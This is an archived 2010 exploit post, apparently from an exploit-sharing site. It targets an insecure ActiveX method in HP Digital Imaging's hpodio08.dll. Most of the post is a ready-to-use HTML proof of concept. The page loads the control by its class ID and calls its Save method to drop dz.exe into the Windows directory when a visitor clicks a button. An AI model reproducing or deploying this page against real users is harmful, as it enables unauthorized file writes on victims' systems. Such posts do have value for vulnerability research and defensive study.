HP Digital Imaging (hpodio08.dll) Insecure Method Exploit
Posted on 24 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>HP Digital Imaging (hpodio08.dll) Insecure Method Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================= HP Digital Imaging (hpodio08.dll) Insecure Method Exploit ========================================================= # Exploit Title: HP Digital Imaging (hpodio08.dll) Insecure Method Exploit # Author: ThE g0bL!N # Version: All vesion # Tested on: Windows xp pack 2 # Code : <title>Exploited By : ThE g0bL!N </title> <BODY> <object id=dz classid="clsid:{697F5209-0494-11D6-A2B0-0060B0FBD872}"></object> <SCRIPT> function Do_it() { File = "dz.exe" dz.Save(File) } </SCRIPT> <h3>HP Digital Imaging (hpodio08.dll) Insecure Method Exploit </h3> <input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> </body> </HTML> ## Note: Dz.exe Will be created In C:WINDOWS :) ## 01110010 01100001 01111010 01101001 01101011 01100001 00100000 I try To hate You but i can't # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>